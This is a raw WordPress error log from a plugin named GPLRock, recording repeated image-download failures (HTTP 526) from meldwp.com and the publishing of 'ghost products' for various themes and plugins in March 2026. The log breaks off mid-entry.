HTTP Code: 526, Error: [14-Mar-2026 01:36:02 UTC] GPLRock: Image download failed for product social-share-page-views-addon-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:36:04 UTC] GPLRock: Image download failed for product social-share-page-views-addon-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:36:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-share-page-views-addon---wordpress-28633.webp for product social-share-page-views-addon-wordpress after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:36:06 UTC] GPLRock WARNING: Image download failed for product social-share-page-views-addon-wordpress. URL: https://meldwp.com/wp-content/uploads/social-share-page-views-addon---wordpress-28633.webp [14-Mar-2026 01:36:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: social-share-page-views-addon-wordpress [14-Mar-2026 01:36:07 UTC] GPLRock: Image download failed for product google-product-feed-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:36:09 UTC] GPLRock: Image download failed for product google-product-feed-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:36:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/google-product-feed-for-woocommerce-3372.webp for product google-product-feed-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:36:11 UTC] GPLRock: Image download failed for product google-product-feed-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:36:13 UTC] GPLRock: Image download failed for product google-product-feed-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:36:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/google-product-feed-for-woocommerce-3372.webp for product google-product-feed-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:36:15 UTC] GPLRock WARNING: Image download failed for product google-product-feed-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/google-product-feed-for-woocommerce-3372.webp [14-Mar-2026 01:36:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: google-product-feed-for-woocommerce [14-Mar-2026 01:36:16 UTC] GPLRock: Image download failed for product disable-everything-wordpress-plugin-to-disable-right-click-copying-keyboard (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:36:18 UTC] GPLRock: Image download failed for product disable-everything-wordpress-plugin-to-disable-right-click-copying-keyboard (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:36:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/disable-everything---wordpress-plugin-to-disable-right-click-copying-keyboard-31917.webp for product disable-everything-wordpress-plugin-to-disable-right-click-copying-keyboard after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:36:20 UTC] GPLRock: Image download failed for product disable-everything-wordpress-plugin-to-disable-right-click-copying-keyboard (attempt 1/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:36:22 UTC] GPLRock: Image download failed for product disable-everything-wordpress-plugin-to-disable-right-click-copying-keyboard (attempt 2/3). HTTP Code: 526, Error: . Retrying... [14-Mar-2026 01:36:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/disable-everything---wordpress-plugin-to-disable-right-click-copying-keyboard-31917.webp for product disable-everything-wordpress-plugin-to-disable-right-click-copying-keyboard after 3 attempts. HTTP Code: 526, Error: [14-Mar-2026 01:36:24 UTC] GPLRock WARNING: Image download failed for product disable-everything-wordpress-plugin-to-disable-right-click-copying-keyboard. URL: https://meldwp.com/wp-content/uploads/disable-everything---wordpress-plugin-to-disable-right-click-copying-keyboard-31917.webp [14-Mar-2026 01:36:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: disable-everything-wordpress-plugin-to-disable-right-click-copying-keyboard [15-Mar-2026 01:38:18 UTC] GPLRock: Image downloaded successfully for product bijoux-jewellery-ecommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-73a63056.jpg [15-Mar-2026 01:38:19 UTC] GPLRock: Using pre-downloaded image for product bijoux-jewellery-ecommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-73a63056.jpg [15-Mar-2026 01:38:19 UTC] GPLRock: Ghost product published with image - Product ID: bijoux-jewellery-ecommerce-wordpress-theme [15-Mar-2026 01:38:19 UTC] GPLRock: Image downloaded successfully for product vc-particles-background (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-90520d7c.webp [15-Mar-2026 01:38:19 UTC] GPLRock: Using pre-downloaded image for product vc-particles-background: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-90520d7c.webp [15-Mar-2026 01:38:19 UTC] GPLRock: Ghost product published with image - Product ID: vc-particles-background [15-Mar-2026 01:38:19 UTC] GPLRock: Image downloaded successfully for product responsive-accordion (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dbfb7c8f.webp [15-Mar-2026 01:38:19 UTC] GPLRock: Using pre-downloaded image for product responsive-accordion: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dbfb7c8f.webp [15-Mar-2026 01:38:19 UTC] GPLRock: Ghost product published with image - Product ID: responsive-accordion [15-Mar-2026 01:38:19 UTC] GPLRock: Image download failed for product nomanic-objects-charts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:38:21 UTC] GPLRock: Image downloaded successfully for product webiso-dark-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-aecaffb5.jpg [15-Mar-2026 01:38:21 UTC] GPLRock: Using pre-downloaded image for product webiso-dark-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-aecaffb5.jpg [15-Mar-2026 01:38:21 UTC] GPLRock: Ghost product published with image - Product ID: webiso-dark-digital-agency-elementor-template-kit [15-Mar-2026 01:38:22 UTC] GPLRock: Image download failed for product nomanic-objects-charts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:38:24 UTC] GPLRock: Image downloaded successfully for product aspire-seo-digital-marketing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-46871846.jpg [15-Mar-2026 01:38:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nomanic-objects---charts-23541.webp for product nomanic-objects-charts after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 01:38:24 UTC] GPLRock: Using pre-downloaded image for product aspire-seo-digital-marketing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-46871846.jpg [15-Mar-2026 01:38:24 UTC] GPLRock: Ghost product published with image - Product ID: aspire-seo-digital-marketing-elementor-template-kit [15-Mar-2026 01:38:24 UTC] GPLRock: Image download failed for product nomanic-objects-charts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:38:26 UTC] GPLRock: Image download failed for product nomanic-objects-charts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:38:26 UTC] GPLRock: Image downloaded successfully for product transpi-logistics-and-transportation-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-39eb48ff.png [15-Mar-2026 01:38:26 UTC] GPLRock: Using pre-downloaded image for product transpi-logistics-and-transportation-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-39eb48ff.png [15-Mar-2026 01:38:26 UTC] GPLRock: Ghost product published with image - Product ID: transpi-logistics-and-transportation-wordpress-theme [15-Mar-2026 01:38:28 UTC] GPLRock: Image downloaded successfully for product industrial-corporate-industry-factory-wordpress-themes (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ab294b24.png [15-Mar-2026 01:38:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nomanic-objects---charts-23541.webp for product nomanic-objects-charts after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 01:38:28 UTC] GPLRock WARNING: Image download failed for product nomanic-objects-charts. URL: https://meldwp.com/wp-content/uploads/nomanic-objects---charts-23541.webp [15-Mar-2026 01:38:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nomanic-objects-charts [15-Mar-2026 01:38:28 UTC] GPLRock: Using pre-downloaded image for product industrial-corporate-industry-factory-wordpress-themes: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ab294b24.png [15-Mar-2026 01:38:28 UTC] GPLRock: Ghost product published with image - Product ID: industrial-corporate-industry-factory-wordpress-themes [15-Mar-2026 01:38:28 UTC] GPLRock: Image download failed for product hotel-booking-mailchimp-integration (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:38:30 UTC] GPLRock: Image downloaded successfully for product aora-home-lifestyle-elementor-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8f1a8f27.jpg [15-Mar-2026 01:38:30 UTC] GPLRock: Image download failed for product hotel-booking-mailchimp-integration (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:38:31 UTC] GPLRock: Using pre-downloaded image for product aora-home-lifestyle-elementor-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8f1a8f27.jpg [15-Mar-2026 01:38:31 UTC] GPLRock: Ghost product published with image - Product ID: aora-home-lifestyle-elementor-woocommerce-theme [15-Mar-2026 01:38:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hotel-booking--mailchimp-integration-15790.webp for product hotel-booking-mailchimp-integration after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 01:38:33 UTC] GPLRock: Image downloaded successfully for product mobex-auto-parts-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-aa7ebdb1.jpg [15-Mar-2026 01:38:33 UTC] GPLRock: Using pre-downloaded image for product mobex-auto-parts-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-aa7ebdb1.jpg [15-Mar-2026 01:38:33 UTC] GPLRock: Ghost product published with image - Product ID: mobex-auto-parts-wordpress-theme [15-Mar-2026 01:38:33 UTC] GPLRock: Image download failed for product hotel-booking-mailchimp-integration (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:38:34 UTC] GPLRock: Image downloaded successfully for product creastic-creative-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c08e0a8a.jpg [15-Mar-2026 01:38:34 UTC] GPLRock: Using pre-downloaded image for product creastic-creative-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c08e0a8a.jpg [15-Mar-2026 01:38:34 UTC] GPLRock: Ghost product published with image - Product ID: creastic-creative-digital-agency-elementor-template-kit [15-Mar-2026 01:38:35 UTC] GPLRock: Image download failed for product hotel-booking-mailchimp-integration (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:38:36 UTC] GPLRock: Image downloaded successfully for product listygo-directory-listing-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-81eb1b1a.png [15-Mar-2026 01:38:37 UTC] GPLRock: Using pre-downloaded image for product listygo-directory-listing-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-81eb1b1a.png [15-Mar-2026 01:38:37 UTC] GPLRock: Ghost product published with image - Product ID: listygo-directory-listing-wordpress-theme [15-Mar-2026 01:38:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hotel-booking--mailchimp-integration-15790.webp for product hotel-booking-mailchimp-integration after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 01:38:37 UTC] GPLRock WARNING: Image download failed for product hotel-booking-mailchimp-integration. URL: https://meldwp.com/wp-content/uploads/hotel-booking--mailchimp-integration-15790.webp [15-Mar-2026 01:38:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hotel-booking-mailchimp-integration [15-Mar-2026 01:38:37 UTC] GPLRock: Image download failed for product mv-360-tour (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:38:38 UTC] GPLRock: Image downloaded successfully for product soflyy-wp-all-import-pro-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b8421161.jpg [15-Mar-2026 01:38:38 UTC] GPLRock: Using pre-downloaded image for product soflyy-wp-all-import-pro-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b8421161.jpg [15-Mar-2026 01:38:38 UTC] GPLRock: Ghost product published with image - Product ID: soflyy-wp-all-import-pro-premium [15-Mar-2026 01:38:39 UTC] GPLRock: Image download failed for product mv-360-tour (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:38:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mv-360-tour-3288.webp for product mv-360-tour after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 01:38:42 UTC] GPLRock: Image download failed for product mv-360-tour (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:38:44 UTC] GPLRock: Image download failed for product mv-360-tour (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:38:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mv-360-tour-3288.webp for product mv-360-tour after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 01:38:46 UTC] GPLRock WARNING: Image download failed for product mv-360-tour. URL: https://meldwp.com/wp-content/uploads/mv-360-tour-3288.webp [15-Mar-2026 01:38:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mv-360-tour [15-Mar-2026 01:38:46 UTC] GPLRock: Image download failed for product image-showcase-for-cornerstone (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:38:48 UTC] GPLRock: Image download failed for product image-showcase-for-cornerstone (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:38:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-showcase-for-cornerstone-32891.webp for product image-showcase-for-cornerstone after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 01:38:50 UTC] GPLRock: Image download failed for product image-showcase-for-cornerstone (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:38:53 UTC] GPLRock: Image download failed for product image-showcase-for-cornerstone (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:38:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-showcase-for-cornerstone-32891.webp for product image-showcase-for-cornerstone after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 01:38:55 UTC] GPLRock WARNING: Image download failed for product image-showcase-for-cornerstone. URL: https://meldwp.com/wp-content/uploads/image-showcase-for-cornerstone-32891.webp [15-Mar-2026 01:38:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: image-showcase-for-cornerstone [15-Mar-2026 01:38:55 UTC] GPLRock: Image download failed for product authorizenet-payment-terminal (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:38:57 UTC] GPLRock: Image download failed for product authorizenet-payment-terminal (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:38:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/authorizenet-payment-terminal-10071.webp for product authorizenet-payment-terminal after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 01:38:59 UTC] GPLRock: Image download failed for product authorizenet-payment-terminal (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:39:01 UTC] GPLRock: Image download failed for product authorizenet-payment-terminal (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:39:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/authorizenet-payment-terminal-10071.webp for product authorizenet-payment-terminal after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 01:39:03 UTC] GPLRock WARNING: Image download failed for product authorizenet-payment-terminal. URL: https://meldwp.com/wp-content/uploads/authorizenet-payment-terminal-10071.webp [15-Mar-2026 01:39:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: authorizenet-payment-terminal [15-Mar-2026 01:39:05 UTC] GPLRock: Image download failed for product wordpress-api-posts-and-pages-sync-with-multiple-wordpress-sites (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:39:07 UTC] GPLRock: Image download failed for product wordpress-api-posts-and-pages-sync-with-multiple-wordpress-sites (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:39:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-api-posts-and-pages-sync-with-multiple-wordpress-sites-17176.webp for product wordpress-api-posts-and-pages-sync-with-multiple-wordpress-sites after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 01:39:09 UTC] GPLRock: Image download failed for product wordpress-api-posts-and-pages-sync-with-multiple-wordpress-sites (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:39:11 UTC] GPLRock: Image download failed for product wordpress-api-posts-and-pages-sync-with-multiple-wordpress-sites (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:39:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-api-posts-and-pages-sync-with-multiple-wordpress-sites-17176.webp for product wordpress-api-posts-and-pages-sync-with-multiple-wordpress-sites after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 01:39:14 UTC] GPLRock WARNING: Image download failed for product wordpress-api-posts-and-pages-sync-with-multiple-wordpress-sites. URL: https://meldwp.com/wp-content/uploads/wordpress-api-posts-and-pages-sync-with-multiple-wordpress-sites-17176.webp [15-Mar-2026 01:39:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-api-posts-and-pages-sync-with-multiple-wordpress-sites [15-Mar-2026 01:39:16 UTC] GPLRock: Image downloaded successfully for product meet-the-team-with-carousel-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-07ee800b.webp [15-Mar-2026 01:39:16 UTC] GPLRock: Using pre-downloaded image for product meet-the-team-with-carousel-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-07ee800b.webp [15-Mar-2026 01:39:16 UTC] GPLRock: Ghost product published with image - Product ID: meet-the-team-with-carousel-for-wordpress [15-Mar-2026 01:39:16 UTC] GPLRock: Image download failed for product adforest-classified-native-ios-app (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:39:18 UTC] GPLRock: Image download failed for product adforest-classified-native-ios-app (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:39:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adforest---classified-native-ios-app-21635.webp for product adforest-classified-native-ios-app after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 01:39:21 UTC] GPLRock: Image download failed for product adforest-classified-native-ios-app (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:39:23 UTC] GPLRock: Image download failed for product adforest-classified-native-ios-app (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 01:39:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adforest---classified-native-ios-app-21635.webp for product adforest-classified-native-ios-app after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 01:39:25 UTC] GPLRock WARNING: Image download failed for product adforest-classified-native-ios-app. URL: https://meldwp.com/wp-content/uploads/adforest---classified-native-ios-app-21635.webp [15-Mar-2026 01:39:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: adforest-classified-native-ios-app [15-Mar-2026 12:24:13 UTC] GPLRock: Image downloaded successfully for product ozlan-minimal-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a26e1e7d.webp [15-Mar-2026 12:24:13 UTC] GPLRock: Using pre-downloaded image for product ozlan-minimal-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a26e1e7d.webp [15-Mar-2026 12:24:13 UTC] GPLRock: Ghost product published with image - Product ID: ozlan-minimal-portfolio-wordpress-theme [15-Mar-2026 12:24:13 UTC] GPLRock: Image downloaded successfully for product organie-organic-store-food-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5d1ef751.webp [15-Mar-2026 12:24:13 UTC] GPLRock: Using pre-downloaded image for product organie-organic-store-food-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5d1ef751.webp [15-Mar-2026 12:24:13 UTC] GPLRock: Ghost product published with image - Product ID: organie-organic-store-food-woocommerce-theme [15-Mar-2026 12:24:13 UTC] GPLRock: Image download failed for product solvency-finance-credit-repair-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:15 UTC] GPLRock: Image download failed for product solvency-finance-credit-repair-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/solvency---finance--credit-repair-wordpress-theme-16450.webp for product solvency-finance-credit-repair-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 12:24:18 UTC] GPLRock: Image download failed for product solvency-finance-credit-repair-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:20 UTC] GPLRock: Image download failed for product solvency-finance-credit-repair-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/solvency---finance--credit-repair-wordpress-theme-16450.webp for product solvency-finance-credit-repair-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 12:24:22 UTC] GPLRock WARNING: Image download failed for product solvency-finance-credit-repair-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/solvency---finance--credit-repair-wordpress-theme-16450.webp [15-Mar-2026 12:24:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: solvency-finance-credit-repair-wordpress-theme [15-Mar-2026 12:24:22 UTC] GPLRock: Image download failed for product visard-immigration-visa-center-travel-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:24 UTC] GPLRock: Image download failed for product visard-immigration-visa-center-travel-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visard---immigration-visa-center--travel-agency-wordpress-theme-30451.webp for product visard-immigration-visa-center-travel-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 12:24:26 UTC] GPLRock: Image download failed for product visard-immigration-visa-center-travel-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:28 UTC] GPLRock: Image download failed for product visard-immigration-visa-center-travel-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visard---immigration-visa-center--travel-agency-wordpress-theme-30451.webp for product visard-immigration-visa-center-travel-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 12:24:30 UTC] GPLRock WARNING: Image download failed for product visard-immigration-visa-center-travel-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/visard---immigration-visa-center--travel-agency-wordpress-theme-30451.webp [15-Mar-2026 12:24:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: visard-immigration-visa-center-travel-agency-wordpress-theme [15-Mar-2026 12:24:31 UTC] GPLRock: Image download failed for product isabella-digital-marketing-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:33 UTC] GPLRock: Image download failed for product isabella-digital-marketing-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/isabella---digital-marketing-agency-wordpress-theme-15405.webp for product isabella-digital-marketing-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 12:24:35 UTC] GPLRock: Image download failed for product isabella-digital-marketing-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:37 UTC] GPLRock: Image download failed for product isabella-digital-marketing-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/isabella---digital-marketing-agency-wordpress-theme-15405.webp for product isabella-digital-marketing-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 12:24:39 UTC] GPLRock WARNING: Image download failed for product isabella-digital-marketing-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/isabella---digital-marketing-agency-wordpress-theme-15405.webp [15-Mar-2026 12:24:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: isabella-digital-marketing-agency-wordpress-theme [15-Mar-2026 12:24:39 UTC] GPLRock: Image download failed for product vorsa-portfolio-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:42 UTC] GPLRock: Image download failed for product vorsa-portfolio-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vorsa---portfolio--agency-wordpress-theme-17796.webp for product vorsa-portfolio-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 12:24:44 UTC] GPLRock: Image download failed for product vorsa-portfolio-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:46 UTC] GPLRock: Image download failed for product vorsa-portfolio-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vorsa---portfolio--agency-wordpress-theme-17796.webp for product vorsa-portfolio-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 12:24:48 UTC] GPLRock WARNING: Image download failed for product vorsa-portfolio-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vorsa---portfolio--agency-wordpress-theme-17796.webp [15-Mar-2026 12:24:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vorsa-portfolio-agency-wordpress-theme [15-Mar-2026 12:24:48 UTC] GPLRock: Image download failed for product ubershop-responsive-flat-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:50 UTC] GPLRock: Image download failed for product ubershop-responsive-flat-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ubershop---responsive-flat-woocommerce-theme-23579.webp for product ubershop-responsive-flat-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 12:24:52 UTC] GPLRock: Image download failed for product ubershop-responsive-flat-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:54 UTC] GPLRock: Image download failed for product ubershop-responsive-flat-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ubershop---responsive-flat-woocommerce-theme-23579.webp for product ubershop-responsive-flat-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 12:24:57 UTC] GPLRock WARNING: Image download failed for product ubershop-responsive-flat-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/ubershop---responsive-flat-woocommerce-theme-23579.webp [15-Mar-2026 12:24:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ubershop-responsive-flat-woocommerce-theme [15-Mar-2026 12:24:57 UTC] GPLRock: Image download failed for product anycar-automotive-dealership-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 12:24:59 UTC] GPLRock: Image download failed for product anycar-automotive-dealership-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 